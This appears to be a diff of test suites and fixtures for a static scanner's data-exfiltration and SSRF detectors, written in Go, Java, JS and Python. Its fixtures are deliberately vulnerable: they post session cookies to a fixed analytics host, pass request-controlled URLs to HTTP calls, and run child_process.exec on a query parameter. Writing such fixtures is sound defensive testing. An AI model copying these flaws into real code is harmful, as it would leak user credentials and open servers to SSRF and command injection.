/// `data_exfil_http_post.go`: a tainted body sent to a fixed URL must be
/// reported as data exfiltration and never as SSRF.
#[test]
fn http_post_body_data_exfil_emits_data_exfil_not_ssrf() {
    let diags = diags_for("data_exfil_http_post.go");
    // Findings are bucketed by rule-id prefix.
    let count_with_prefix =
        |prefix: &str| diags.iter().filter(|d| d.id.starts_with(prefix)).count();
    let exfil = count_with_prefix("taint-data-exfiltration");
    let plain_taint = count_with_prefix("taint-unsanitised-flow");
    // Collected once; printed by whichever assertion fails.
    let ids: Vec<_> = diags.iter().map(|d| &d.id).collect();

    assert!(
        exfil >= 1,
        "expected at least one taint-data-exfiltration finding for cookie → http.Post body, got 0.\n\
         Diags: {:#?}",
        ids,
    );
    assert_eq!(
        plain_taint,
        0,
        "fixed-URL http.Post with tainted body must NOT emit SSRF \
         (taint-unsanitised-flow), got {plain_taint}.\n\
         Diags: {:#?}",
        ids,
    );
}
/// `data_exfil_post_form.go`: tainted form data posted to a fixed URL must
/// be reported as data exfiltration and never as SSRF.
#[test]
fn http_post_form_emits_data_exfil_not_ssrf() {
    let diags = diags_for("data_exfil_post_form.go");
    // Findings are bucketed by rule-id prefix.
    let count_with_prefix =
        |prefix: &str| diags.iter().filter(|d| d.id.starts_with(prefix)).count();
    let exfil = count_with_prefix("taint-data-exfiltration");
    let plain_taint = count_with_prefix("taint-unsanitised-flow");
    // Collected once; printed by whichever assertion fails.
    let ids: Vec<_> = diags.iter().map(|d| &d.id).collect();

    assert!(
        exfil >= 1,
        "expected at least one taint-data-exfiltration finding for header → http.PostForm data, got 0.\n\
         Diags: {:#?}",
        ids,
    );
    assert_eq!(
        plain_taint,
        0,
        "fixed-URL http.PostForm with tainted form data must NOT emit SSRF, got {plain_taint}.\n\
         Diags: {:#?}",
        ids,
    );
}
/// `data_exfil_new_request_do.go`: the two-step
/// `req, _ := http.NewRequest(_, fixedURL, body); http.DefaultClient.Do(req)`
/// idiom.
///
/// NewRequest is modeled as a body propagator (default arg → return), so the
/// request value carries body taint into the DATA_EXFIL gate at Do. SSRF
/// must stay silent because the URL passed to NewRequest is a hardcoded
/// string.
#[test]
fn new_request_do_two_step_emits_data_exfil() {
    let diags = diags_for("data_exfil_new_request_do.go");
    // Findings are bucketed by rule-id prefix.
    let count_with_prefix =
        |prefix: &str| diags.iter().filter(|d| d.id.starts_with(prefix)).count();
    let exfil = count_with_prefix("taint-data-exfiltration");
    let plain_taint = count_with_prefix("taint-unsanitised-flow");
    // Collected once; printed by whichever assertion fails.
    let ids: Vec<_> = diags.iter().map(|d| &d.id).collect();

    assert!(
        exfil >= 1,
        "expected at least one taint-data-exfiltration finding for cookie → NewRequest → Do, got 0.\n\
         Diags: {:#?}",
        ids,
    );
    assert_eq!(
        plain_taint,
        0,
        "two-step NewRequest → Do with hardcoded URL must NOT emit SSRF, got {plain_taint}.\n\
         Diags: {:#?}",
        ids,
    );
}
/// `data_exfil_map_assign.go`: container-taint DATA_EXFIL.
///
/// Cookies populate a `url.Values` map across several keys and the map then
/// flows into `http.PostForm`'s form-data channel. The Elements heap slot
/// has to round-trip the cap from each `form.Set(k, v)` write to the
/// sink-side load, so DATA_EXFIL fires on the body channel even though
/// `form` itself is never directly tainted by an Assign. SSRF must stay
/// silent because the destination URL is a hardcoded literal.
#[test]
fn map_assign_data_exfil_emits_through_url_values() {
    let diags = diags_for("data_exfil_map_assign.go");
    // Findings are bucketed by rule-id prefix.
    let count_with_prefix =
        |prefix: &str| diags.iter().filter(|d| d.id.starts_with(prefix)).count();
    let exfil = count_with_prefix("taint-data-exfiltration");
    let plain_taint = count_with_prefix("taint-unsanitised-flow");
    // Collected once; printed by whichever assertion fails.
    let ids: Vec<_> = diags.iter().map(|d| &d.id).collect();

    assert!(
        exfil >= 1,
        "expected at least one taint-data-exfiltration finding for map_assign cookies → http.PostForm, got 0.\n\
         Diags: {:#?}",
        ids,
    );
    assert_eq!(
        plain_taint,
        0,
        "fixed-URL http.PostForm with tainted map must NOT emit SSRF, got {plain_taint}.\n\
         Diags: {:#?}",
        ids,
    );
}
/// `ssrf_url_tainted.go`: the mirror-image regression guard.
///
/// A tainted query parameter flows into NewRequest's URL position while the
/// body is hardcoded, so SSRF must fire on the URL flow and DATA_EXFIL must
/// stay silent (no Sensitive source reaches the body).
#[test]
fn ssrf_url_tainted_emits_ssrf_not_data_exfil() {
    let diags = diags_for("ssrf_url_tainted.go");
    // Findings are bucketed by rule-id prefix.
    let count_with_prefix =
        |prefix: &str| diags.iter().filter(|d| d.id.starts_with(prefix)).count();
    let ssrf = count_with_prefix("taint-unsanitised-flow");
    let exfil = count_with_prefix("taint-data-exfiltration");
    // Collected once; printed by whichever assertion fails.
    let ids: Vec<_> = diags.iter().map(|d| &d.id).collect();

    assert!(
        ssrf >= 1,
        "expected at least one taint-unsanitised-flow (SSRF) finding, got 0.\n\
         Diags: {:#?}",
        ids,
    );
    assert_eq!(
        exfil,
        0,
        "tainted-URL NewRequest → Do must NOT emit DATA_EXFIL, got {exfil}.\n\
         Diags: {:#?}",
        ids,
    );
}
/// `data_exfil_user_input_silenced.go`: plain attacker-controlled input
/// (`r.FormValue`) echoed into a fixed-URL `http.Post` body.
///
/// The source-sensitivity gate strips `Cap::DATA_EXFIL` for Plain sources,
/// so no data-exfiltration finding may be reported.
#[test]
fn http_post_plain_user_input_does_not_emit_data_exfil() {
    let diags = diags_for("data_exfil_user_input_silenced.go");
    let mut exfil = 0;
    for diag in &diags {
        if diag.id.starts_with("taint-data-exfiltration") {
            exfil += 1;
        }
    }
    let ids: Vec<_> = diags.iter().map(|d| &d.id).collect();

    assert_eq!(
        exfil,
        0,
        "plain user input echoed into a Go http.Post body must NOT emit \
         taint-data-exfiltration, got {exfil}.\n\
         Diags: {:#?}",
        ids,
    );
}
/// Cross-file split for the Go two-step idiom.
///
/// The fixture's wrapper has two parameters that target distinct gated-sink
/// classes on one inner two-step: `url` flows to NewRequest's SSRF gate and
/// `body` flows through NewRequest → Do's DATA_EXFIL gate. Each caller
/// taints exactly one parameter and must surface only the cap class that
/// belongs to that parameter's gate; the fixture's own expectations encode
/// this.
#[test]
fn cross_file_go_data_exfil_split() {
    let mut dir = Path::new(env!("CARGO_MANIFEST_DIR")).to_path_buf();
    for segment in ["tests", "fixtures", "cross_file_go_data_exfil"] {
        dir.push(segment);
    }
    let findings = scan_fixture_dir(&dir, AnalysisMode::Full);
    validate_expectations(&findings, &dir);
}

View file

@ -0,0 +1,138 @@
//! Integration tests for the Java bindings of the `Cap::DATA_EXFIL`
//! detector class.
//!
//! Mirrors the JS `fetch_data_exfil_integration_tests` and Go
//! `data_exfil_go_integration_tests` shapes. Each chained-API HTTP
//! client (java.net.http, Spring RestTemplate / WebClient, OkHttp,
//! Apache HttpClient) gets its own fixture: a Sensitive source flows
//! through the body-binding chain into a fixed-URL outbound call, and
//! the regression fixture proves SSRF still fires on a tainted URL
//! without leaking into DATA_EXFIL.
//!
//! Body-binding chain propagators (`BodyPublishers.ofString`,
//! `RequestBody.create`, `StringEntity` ctor, builder `.uri()` /
//! `.POST()` / `.bodyValue()`) carry taint through the chain via the
//! transfer engine's default arg → return smear, so no per-callee
//! propagator rules are needed; the sink at the network call sees the
//! end-of-chain request value carrying body taint.
mod common;
use common::scan_fixture_dir;
use nyx_scanner::commands::scan::Diag;
use nyx_scanner::utils::config::AnalysisMode;
use std::path::PathBuf;
/// Absolute path of `tests/fixtures/java` under the crate root
/// (`CARGO_MANIFEST_DIR`, resolved at compile time).
fn java_fixture_dir() -> PathBuf {
    let mut dir = PathBuf::from(env!("CARGO_MANIFEST_DIR"));
    for part in ["tests", "fixtures", "java"] {
        dir.push(part);
    }
    dir
}
/// Scans the whole Java fixture directory in `AnalysisMode::Full` and
/// keeps only the diagnostics whose path ends with `file`.
fn diags_for(file: &str) -> Vec<Diag> {
    let dir = java_fixture_dir();
    let mut matching = Vec::new();
    for diag in scan_fixture_dir(&dir, AnalysisMode::Full) {
        if diag.path.ends_with(file) {
            matching.push(diag);
        }
    }
    matching
}
/// Shared assertion for the positive fixtures: `file` must produce at
/// least one `taint-data-exfiltration` finding and zero
/// `taint-unsanitised-flow` (SSRF) findings.
fn assert_data_exfil_fires_no_ssrf(file: &str) {
    let diags = diags_for(file);
    // Number of findings whose rule id starts with the given prefix.
    let count_prefixed = |prefix: &str| {
        diags
            .iter()
            .filter(|d| d.id.starts_with(prefix))
            .count()
    };
    // Rule ids of every finding, only materialised for failure messages.
    let ids = || diags.iter().map(|d| &d.id).collect::<Vec<_>>();

    let exfil = count_prefixed("taint-data-exfiltration");
    let plain_taint = count_prefixed("taint-unsanitised-flow");

    assert!(
        exfil >= 1,
        "{file}: expected at least one taint-data-exfiltration finding, got 0.\n\
         Diags: {:#?}",
        ids(),
    );
    assert_eq!(
        plain_taint,
        0,
        "{file}: fixed-URL call with tainted body must NOT emit SSRF \
         (taint-unsanitised-flow), got {plain_taint}.\n\
         Diags: {:#?}",
        ids(),
    );
}
#[test]
fn jdk_http_client_chain_emits_data_exfil_not_ssrf() {
    // java.net.http fixture: a cookie value goes through
    // `BodyPublishers.ofString` and the request builder chain into
    // `client.send(req)`. Type-qualified resolution rewrites
    // `client.send` to `HttpClient.send`, so both the flat DATA_EXFIL
    // rule and the existing flat SSRF rule attach; because the URL is
    // hardcoded, only DATA_EXFIL is expected to surface.
    let fixture = "data_exfil_jdk_httpclient.java";
    assert_data_exfil_fires_no_ssrf(fixture);
}
#[test]
fn rest_template_post_for_object_emits_data_exfil_not_ssrf() {
    // Spring RestTemplate fixture: a request header flows into the body
    // argument of `restTemplate.postForObject(url, body, type)`.
    // RestTemplate subtypes HttpClient via JAVA_HIERARCHY, so
    // type-qualified resolution lands on the same flat rule the JDK
    // client uses.
    let fixture = "data_exfil_resttemplate.java";
    assert_data_exfil_fires_no_ssrf(fixture);
}
#[test]
fn web_client_body_value_emits_data_exfil_not_ssrf() {
    // Spring WebClient fixture: an env var flows through
    // `webClient.post().uri(u).bodyValue(p).retrieve()`. The body-bind
    // step `bodyValue` carries a flat DATA_EXFIL sink rule matched by
    // bare-name suffix, independent of receiver typing (the chain
    // receiver type is RequestBodySpec).
    let fixture = "data_exfil_webclient.java";
    assert_data_exfil_fires_no_ssrf(fixture);
}
#[test]
fn ok_http_new_call_execute_emits_data_exfil_not_ssrf() {
    // OkHttp two-step fixture: a session attribute is wrapped by
    // `RequestBody.create`, bound through the builder chain, and sent
    // with `client.newCall(req).execute()`. Chain normalization strips
    // the `()` between dots, so the `newCall.execute` suffix matches.
    let fixture = "data_exfil_okhttp.java";
    assert_data_exfil_fires_no_ssrf(fixture);
}
#[test]
fn apache_http_client_execute_emits_data_exfil_not_ssrf() {
    // Apache HttpClient fixture: a cookie value is wrapped in a
    // `StringEntity`, attached with `HttpPost.setEntity`, and sent via
    // `httpClient.execute(req)`. CloseableHttpClient subtypes
    // HttpClient, so type-qualified resolution rewrites the call to
    // `HttpClient.execute` and reuses the same flat rule.
    let fixture = "data_exfil_apache_httpclient.java";
    assert_data_exfil_fires_no_ssrf(fixture);
}
#[test]
fn ssrf_url_only_emits_ssrf_not_data_exfil() {
    // Inverse of the positive fixtures: the URL is tainted and the body
    // is hardcoded. SSRF has to fire on the URL flow, while DATA_EXFIL
    // must stay silent because no Sensitive source reaches the body.
    // This keeps the new flat DATA_EXFIL rule from over-firing.
    let diags = diags_for("ssrf_url_only_no_data_exfil.java");
    // Number of findings whose rule id starts with the given prefix.
    let count_prefixed = |prefix: &str| {
        diags
            .iter()
            .filter(|d| d.id.starts_with(prefix))
            .count()
    };
    // Rule ids of every finding, only materialised for failure messages.
    let ids = || diags.iter().map(|d| &d.id).collect::<Vec<_>>();

    let ssrf = count_prefixed("taint-unsanitised-flow");
    let exfil = count_prefixed("taint-data-exfiltration");

    assert!(
        ssrf >= 1,
        "expected at least one taint-unsanitised-flow (SSRF) finding, got 0.\n\
         Diags: {:#?}",
        ids(),
    );
    assert_eq!(
        exfil,
        0,
        "tainted-URL HttpClient.send must NOT emit DATA_EXFIL, got {exfil}.\n\
         Diags: {:#?}",
        ids(),
    );
}

View file

@ -38,12 +38,17 @@ fn test_cfg() -> Config {
}
fn seed_project(root: &Path) {
// Use the qualified `child_process.exec` form so the seed produces a
// taint finding under the post-fix label rules (bare `exec` as a flat
// sink was removed because it suffix-matched any `<recv>.exec`, e.g.
// Dockerode `container.exec`). The qualified form is the canonical
// Node.js stdlib path and stays a flat sink.
std::fs::write(
root.join("cmdi.js"),
b"const cp = require('child_process');\n\
b"const child_process = require('child_process');\n\
const express = require('express');\n\
const app = express();\n\
app.get('/x', (req, res) => { cp.exec(req.query.cmd); res.send('ok'); });\n",
app.get('/x', (req, res) => { child_process.exec(req.query.cmd); res.send('ok'); });\n",
)
.unwrap();
}

View file

@ -5,6 +5,12 @@
//! headers / json flow), and a tainted body must not surface as SSRF and
//! vice versa. Also sanity-checks the SARIF output so the new finding
//! class produces a distinct rule id.
//!
//! `DATA_EXFIL` is gated on source sensitivity: only `Sensitive`-tier
//! sources (cookies, headers, env, db rows, file reads) trigger the cap.
//! Plain user input echoed back into a body is *not* data exfiltration —
//! the user already controls the value. See
//! `fetch_body_user_input_silenced.js` for the negative regression.
mod common;
@ -79,6 +85,87 @@ fn fetch_ssrf_url_tainted_emits_ssrf_not_data_exfil() {
);
}
#[test]
fn fetch_body_plain_user_input_does_not_emit_data_exfil() {
    // Negative regression for the source-sensitivity gate:
    // `req.body.message` is plain attacker-controlled input, and sending
    // it in the body of a fixed-URL `fetch` is not a cross-boundary
    // disclosure (the user already controls the value), so
    // `Cap::DATA_EXFIL` must not fire.
    let diags = diags_for("fetch_body_user_input_silenced.js");
    // Collect the rule ids once; they drive both the count and the
    // failure message.
    let ids: Vec<_> = diags.iter().map(|d| &d.id).collect();
    let exfil = ids
        .iter()
        .filter(|id| id.starts_with("taint-data-exfiltration"))
        .count();
    assert_eq!(
        exfil,
        0,
        "plain user input echoed into a fetch body must NOT emit \
         taint-data-exfiltration, got {exfil}.\n\
         Diags: {:#?}",
        ids,
    );
}
#[test]
fn fetch_body_data_exfil_witness_mentions_session_token() {
    // Symex-witness regression guard for the cookie → fetch body
    // fixture. When a DATA_EXFIL finding carries a witness string, that
    // string must show the leak as a credential-bearing payload rather
    // than an injection: the cap-specific payload selector in
    // `src/symex/witness.rs::witness_payload` returns `<SESSION_TOKEN>`
    // for `Cap::DATA_EXFIL`, and the rendered witness (via
    // `get_sink_witness`) substitutes it into the string-renderable
    // expression.
    //
    // The assertion is deliberately one-sided. If symex emits no witness
    // for this flow (e.g. the expression tree was opaque), the loop body
    // never runs and the test passes: the witness *shape* is locked, but
    // witness absence is not a hard failure here (the calibration suite
    // already covers the no-witness path).
    let diags = diags_for("fetch_body_data_exfil.js");
    let exfil_witnesses = diags
        .iter()
        .filter(|d| d.id.starts_with("taint-data-exfiltration"))
        .filter_map(|d| d.evidence.as_ref()?.symbolic.as_ref()?.witness.as_ref());
    for w in exfil_witnesses {
        // Accept the token itself or any body/payload wording.
        let mentions_payload = ["<SESSION_TOKEN>", "body", "payload"]
            .iter()
            .any(|needle| w.contains(*needle));
        assert!(
            mentions_payload,
            "DATA_EXFIL witness must mention the leaked payload \
             (<SESSION_TOKEN>) or body/payload context. Got: {w:?}",
        );
    }
}
#[test]
fn fetch_body_int_value_does_not_emit_data_exfil() {
    // Type-suppression regression: a numeric body such as
    // `parseInt(req.cookies.session_count)` cannot carry session tokens,
    // header secrets, or other credential material.
    // `is_type_safe_for_sink` lists `DATA_EXFIL` in its type-suppressible
    // cap mask, so a proven-Int SSA value at the gate silences the
    // finding.
    let diags = diags_for("fetch_body_int_suppressed.js");
    // Collect the rule ids once; they drive both the count and the
    // failure message.
    let ids: Vec<_> = diags.iter().map(|d| &d.id).collect();
    let exfil = ids
        .iter()
        .filter(|id| id.starts_with("taint-data-exfiltration"))
        .count();
    assert_eq!(
        exfil,
        0,
        "int-typed body must NOT emit taint-data-exfiltration, got {exfil}.\n\
         Diags: {:#?}",
        ids,
    );
}
#[test]
fn sarif_distinguishes_data_exfil_rule_id_from_ssrf() {
use nyx_scanner::output::build_sarif;
@ -106,20 +193,35 @@ fn sarif_distinguishes_data_exfil_rule_id_from_ssrf() {
let results = sarif["runs"][0]["results"]
.as_array()
.expect("SARIF results array");
let exfil_results = results
let exfil_results: Vec<&serde_json::Value> = results
.iter()
.filter(|r| r["ruleId"].as_str() == Some("taint-data-exfiltration"))
.count();
.collect();
let ssrf_results = results
.iter()
.filter(|r| r["ruleId"].as_str() == Some("taint-unsanitised-flow"))
.count();
assert!(
exfil_results >= 1,
"expected >= 1 SARIF result with ruleId taint-data-exfiltration, got {exfil_results}",
!exfil_results.is_empty(),
"expected >= 1 SARIF result with ruleId taint-data-exfiltration, got {}",
exfil_results.len(),
);
assert!(
ssrf_results >= 1,
"expected >= 1 SARIF result with ruleId taint-unsanitised-flow, got {ssrf_results}",
);
// Every DATA_EXFIL finding from the fixture set targets the request body
// (`fetch('/endpoint', { body: payload })`), so SARIF must surface the
// destination field via `properties.data_exfil_field`. At least one
// result has to advertise `body`, fixtures that reach `headers` /
// `json` are out of scope for this assertion but must not be silenced.
let body_field_seen = exfil_results
.iter()
.any(|r| r["properties"]["data_exfil_field"].as_str() == Some("body"));
assert!(
body_field_seen,
"expected at least one taint-data-exfiltration SARIF result with \
properties.data_exfil_field == \"body\". Results: {exfil_results:#?}",
);
}

View file

@ -0,0 +1,142 @@
//! `Cap::DATA_EXFIL` suppression-layer integration tests.
//!
//! Three layers are exercised:
//!
//! 1. Sanitizer convention. `logEvent({user: req.cookies.session})`
//! routes a Sensitive cookie source through a named telemetry
//! boundary; the default sanitizer rule for `logEvent` clears the
//! cap.
//! 2. Per-project destination allowlist. With
//! `detectors.data_exfil.trusted_destinations = ["https://api.internal/"]`
//! installed via the runtime, a `fetch('https://api.internal/...',
//! {body: tainted})` call has the cap suppressed for that gate only;
//! a `fetch('https://untrusted.example.com/...', ...)` call on a
//! destination NOT in the allowlist still emits the finding.
//! 3. Detector-class enabled toggle. When
//! `detectors.data_exfil.enabled = false` is installed, no
//! `taint-data-exfiltration` finding is emitted regardless of which
//! gate would have fired.
//!
//! All sub-cases run inside a single `#[test]` so the global
//! `detector_options` runtime is mutated sequentially. Each sub-case
//! installs its own configuration via `reinstall`, and the suite resets
//! to defaults at the end so any other test in this process is unaffected.
mod common;
use common::scan_fixture_dir;
use nyx_scanner::commands::scan::Diag;
use nyx_scanner::utils::config::AnalysisMode;
use nyx_scanner::utils::detector_options::{DataExfilDetectorOptions, DetectorOptions, reinstall};
use std::path::PathBuf;
/// Absolute path of `tests/fixtures/js` under the crate root
/// (`CARGO_MANIFEST_DIR`, resolved at compile time).
fn js_fixture_dir() -> PathBuf {
    let mut dir = PathBuf::from(env!("CARGO_MANIFEST_DIR"));
    for part in ["tests", "fixtures", "js"] {
        dir.push(part);
    }
    dir
}
/// Scans the whole JS fixture directory in `AnalysisMode::Full` and keeps
/// only the diagnostics whose path ends with `file`.
fn diags_for(file: &str) -> Vec<Diag> {
    let dir = js_fixture_dir();
    let mut matching = Vec::new();
    for diag in scan_fixture_dir(&dir, AnalysisMode::Full) {
        if diag.path.ends_with(file) {
            matching.push(diag);
        }
    }
    matching
}
/// Number of diagnostics whose rule id starts with
/// `taint-data-exfiltration`.
fn count_data_exfil(diags: &[Diag]) -> usize {
    diags
        .iter()
        .map(|d| usize::from(d.id.starts_with("taint-data-exfiltration")))
        .sum()
}
/// Replaces the installed detector options with `DetectorOptions::default()`.
fn install_default_detectors() {
    let defaults = DetectorOptions::default();
    reinstall(defaults);
}
/// Installs detector options with DATA_EXFIL enabled and `prefixes` as
/// the trusted-destination list.
fn install_with_trusted(prefixes: &[&str]) {
    let trusted_destinations = prefixes.iter().copied().map(String::from).collect();
    let data_exfil = DataExfilDetectorOptions {
        enabled: true,
        trusted_destinations,
    };
    reinstall(DetectorOptions { data_exfil });
}
/// Installs detector options with DATA_EXFIL switched off and an empty
/// trusted-destination list.
fn install_disabled() {
    let data_exfil = DataExfilDetectorOptions {
        enabled: false,
        trusted_destinations: vec![],
    };
    reinstall(DetectorOptions { data_exfil });
}
#[test]
fn data_exfil_suppression_suite() {
    // Single sequential test: every sub-case below swaps the installed
    // detector options via `reinstall` before scanning, so the order of
    // the install_* calls and the scans that follow them matters.

    // ── 1. sanitizer-convention: `logEvent` clears the cap.
    install_default_detectors();
    let diags = diags_for("fetch_data_exfil_sanitizer_wrap.js");
    assert_eq!(
        count_data_exfil(&diags),
        0,
        "logEvent default sanitizer must clear DATA_EXFIL.\n\
         Diags: {:#?}",
        diags.iter().map(|d| &d.id).collect::<Vec<_>>(),
    );
    // ── 2a. allowlist drops cap on trusted destination.
    install_with_trusted(&["https://api.internal/"]);
    let diags = diags_for("fetch_data_exfil_allowlist_suppressed.js");
    assert_eq!(
        count_data_exfil(&diags),
        0,
        "trusted destination prefix must drop DATA_EXFIL for that filter.\n\
         Diags: {:#?}",
        diags.iter().map(|d| &d.id).collect::<Vec<_>>(),
    );
    // ── 2b. negative: a destination NOT in the allowlist still fires.
    // Same allowlist as 2a, installed again so this sub-case does not
    // depend on the one before it.
    install_with_trusted(&["https://api.internal/"]);
    let diags = diags_for("fetch_data_exfil_external_destination.js");
    assert!(
        count_data_exfil(&diags) >= 1,
        "destination not in allowlist must still emit DATA_EXFIL.\n\
         Diags: {:#?}",
        diags.iter().map(|d| &d.id).collect::<Vec<_>>(),
    );
    // ── 3a. detector toggle off ⇒ no DATA_EXFIL anywhere.
    install_disabled();
    let diags_internal = diags_for("fetch_data_exfil_allowlist_suppressed.js");
    let diags_external = diags_for("fetch_data_exfil_external_destination.js");
    let diags_classic = diags_for("fetch_body_data_exfil.js");
    assert_eq!(
        count_data_exfil(&diags_internal),
        0,
        "enabled=false must suppress DATA_EXFIL on the internal-destination fixture",
    );
    assert_eq!(
        count_data_exfil(&diags_external),
        0,
        "enabled=false must suppress DATA_EXFIL on the external-destination fixture",
    );
    assert_eq!(
        count_data_exfil(&diags_classic),
        0,
        "enabled=false must suppress DATA_EXFIL on the original cookie-leak fixture",
    );
    // ── 3b. re-enable ⇒ classic cookie-leak fixture fires again
    // (regression guard for the toggle).
    install_default_detectors();
    let diags_classic = diags_for("fetch_body_data_exfil.js");
    assert!(
        count_data_exfil(&diags_classic) >= 1,
        "after re-enabling, the classic cookie-leak fixture must emit DATA_EXFIL again",
    );
    // Reset to defaults so any other test that runs later in this
    // process picks up the documented baseline. Note that this line is
    // only reached when every assertion above passed.
    install_default_detectors();
}

View file

@ -0,0 +1,16 @@
var express = require('express');
var { forward } = require('./helper');
var app = express();
// Tainted body, fixed URL: DATA_EXFIL must fire on the body flow. The
// session cookie is a Sensitive-tier source, so taint carries the
// DATA_EXFIL bit through to the wrapper's body-gate. SSRF must NOT
// fire — the URL is a hardcoded literal and the cap-vs-position split
// keeps the body's taint from leaking onto the URL's gate.
// GET /sync: wraps the session cookie in a JSON string and passes it to
// `forward` as the body; the destination URL is a string literal.
app.get('/sync', function(req, res) {
  var sid = req.cookies.session; // cookie value read from the request
  var payload = JSON.stringify({ session: sid }); // cookie value ends up inside the serialized body
  forward('https://analytics.internal/track', payload); // literal URL, cookie-derived body
  res.status(204).end();
});

View file

@ -0,0 +1,14 @@
var express = require('express');
var { forward } = require('./helper');
var app = express();
// Tainted URL, fixed body: SSRF must fire on the URL flow. DATA_EXFIL
// must NOT fire — the body is a literal string, not a sensitive source,
// and the cap-vs-position split through the wrapper's summary keeps the
// URL's taint from leaking onto the body's gate.
// GET /proxy: passes the `url` query parameter to `forward` as the
// destination; the body is a string literal.
app.get('/proxy', function(req, res) {
  var taintedUrl = req.query.url; // request-controlled destination
  forward(taintedUrl, '{"ok":true}'); // request-controlled URL, literal body
  res.status(204).end();
});

View file

@ -0,0 +1,22 @@
{
"required_findings": [
{ "id_prefix": "taint-unsanitised-flow", "min_count": 1 },
{ "id_prefix": "taint-data-exfiltration", "min_count": 1 }
],
"forbidden_findings": [
{
"id_prefix": "taint-data-exfiltration",
"file_glob": "**/caller_url_tainted.js"
},
{
"id_prefix": "taint-unsanitised-flow",
"file_glob": "**/caller_body_tainted.js"
}
],
"performance_expectations": {
"max_ms_no_index": 1500,
"max_ms_index_cold": 2000,
"max_ms_index_warm": 800,
"ci_mode": "lenient"
}
}

View file

@ -0,0 +1,10 @@
// Wrapper around `fetch` whose two parameters target distinct gated-sink
// classes on the inner call: `url` is the SSRF gate's destination; `body`
// is the DATA_EXFIL gate's payload. Pass-1 SSA summary extraction lifts
// the per-position cap split into `param_to_gate_filters` so cross-file
// callers can attribute SSRF vs DATA_EXFIL per argument.
// Issues a POST via `fetch` to `url` with `body` as the request body.
// The value returned by `fetch` is not used.
function forward(url, body) {
  fetch(url, { method: 'POST', body: body });
}
module.exports = { forward };

View file

@ -0,0 +1,17 @@
// Tainted body, fixed URL: DATA_EXFIL must fire on the body flow. The
// session cookie is a Sensitive-tier source, so taint carries the
// DATA_EXFIL bit through to the body gate of the wrapper's `http.Post`
// call. SSRF must NOT fire — the URL is a hardcoded literal and
// per-position cap attribution keeps the body's taint from leaking onto
// the URL's gate.
package fixture
import (
"net/http"
"strings"
)
// SyncCookie passes the value of the request's `session` cookie to
// Forward as the body; the destination URL is a string literal.
func SyncCookie(r *http.Request) {
	c, _ := r.Cookie("session") // lookup error is discarded
	body := strings.NewReader(c.Value)
	Forward("https://analytics.internal/track", body) // literal URL, cookie-derived body
}

View file

@ -0,0 +1,16 @@
// Tainted URL, hardcoded body: SSRF must fire on the URL flow. The
// query param is a `Plain` user-input source, so even though it carries
// `Cap::all()` upstream the source-sensitivity gate strips DATA_EXFIL
// for plain inputs. Only SSRF survives.
package fixture
import (
"net/http"
"strings"
)
// ProxyTarget passes the `target` query parameter to Forward as the
// destination URL; the body is built from a string literal.
func ProxyTarget(r *http.Request) {
	target := r.URL.Query().Get("target") // request-controlled destination
	body := strings.NewReader("hardcoded")
	Forward(target, body) // request-controlled URL, literal body
}

View file

@ -0,0 +1,22 @@
{
"required_findings": [
{ "id_prefix": "taint-unsanitised-flow", "min_count": 1 },
{ "id_prefix": "taint-data-exfiltration", "min_count": 1 }
],
"forbidden_findings": [
{
"id_prefix": "taint-data-exfiltration",
"file_glob": "**/caller_url_tainted.go"
},
{
"id_prefix": "taint-unsanitised-flow",
"file_glob": "**/caller_body_tainted.go"
}
],
"performance_expectations": {
"max_ms_no_index": 1500,
"max_ms_index_cold": 2000,
"max_ms_index_warm": 800,
"ci_mode": "lenient"
}
}

View file

@ -0,0 +1,16 @@
// Wrapper whose two parameters target distinct gated-sink classes on the
// inner call: `url` is the SSRF gate's destination at `http.Post`'s
// arg 0; `body` is the DATA_EXFIL gate's payload at arg 2. Pass-1 SSA
// summary extraction lifts the per-position cap split into
// `param_to_gate_filters` so cross-file callers attribute SSRF vs
// DATA_EXFIL per argument.
package fixture
import (
"io"
"net/http"
)
// Forward posts `body` to `url` with content type "text/plain". The
// response and error returned by http.Post are discarded.
func Forward(url string, body io.Reader) {
	http.Post(url, "text/plain", body)
}

View file

@ -0,0 +1,18 @@
"""Tainted body, fixed URL: DATA_EXFIL must fire on the body flow. The
session cookie is a Sensitive-tier source, so taint carries the
DATA_EXFIL bit through to the wrapper's body-gate. SSRF must NOT fire —
the URL is a hardcoded literal and the cap-vs-position split keeps the
body's taint from leaking onto the URL's gate.
"""
from flask import Flask, session
from helper import forward
app = Flask(__name__)
# Route handler: reads `user_token` from the Flask session and hands it to
# `forward` inside the body dict; the destination URL is a string literal.
@app.route('/sync')
def sync():
    sid = session.get('user_token')
    forward('https://analytics.internal/track', {'session': sid})  # literal URL, session-derived body
    return '', 204

View file

@ -0,0 +1,17 @@
"""Tainted URL, fixed body: SSRF must fire on the URL flow. DATA_EXFIL
must NOT fire — the body is a literal dict, not a sensitive source, and
the cap-vs-position split through the wrapper's summary keeps the URL's
taint from leaking onto the body's gate.
"""
from flask import Flask, request
from helper import forward
app = Flask(__name__)
# Route handler: passes the `url` query argument to `forward` as the
# destination; the body is a literal dict.
@app.route('/proxy', methods=['POST'])
def proxy():
    tainted_url = request.args.get('url')  # request-controlled destination
    forward(tainted_url, {'event': 'proxy_call'})  # request-controlled URL, literal body
    return '', 204

View file

@ -0,0 +1,22 @@
{
"required_findings": [
{ "id_prefix": "taint-unsanitised-flow", "min_count": 1 },
{ "id_prefix": "taint-data-exfiltration", "min_count": 1 }
],
"forbidden_findings": [
{
"id_prefix": "taint-data-exfiltration",
"file_glob": "**/caller_url_tainted.py"
},
{
"id_prefix": "taint-unsanitised-flow",
"file_glob": "**/caller_body_tainted.py"
}
],
"performance_expectations": {
"max_ms_no_index": 1500,
"max_ms_index_cold": 2000,
"max_ms_index_warm": 800,
"ci_mode": "lenient"
}
}

View file

@ -0,0 +1,12 @@
"""Wrapper around requests.post whose two parameters target distinct
gated-sink classes on the inner call: `url` is the SSRF gate's destination
(arg 0); `body` is the DATA_EXFIL gate's payload (json kwarg). Pass-1 SSA
summary extraction lifts the per-position cap split into
`param_to_gate_filters` so cross-file callers can attribute SSRF vs
DATA_EXFIL per argument.
"""
import requests
# POSTs `body` as the `json` keyword argument of `requests.post` to `url`.
# The response is not used.
def forward(url, body):
    requests.post(url, json=body)

View file

@ -0,0 +1,20 @@
"""demand_driven_data_exfil.
`Cap::DATA_EXFIL` parity for the backwards-analysis pass. The forward
engine emits a `taint-data-exfiltration` finding for the cookie →
`requests.post` body flow (Sensitive source, fixed destination URL). With
`backwards_analysis = true`, the post-pass must walk backwards from the
DATA_EXFIL sink demand, reach the cookie source, and annotate the
finding with `backwards-confirmed`. Validates that the cap-routing
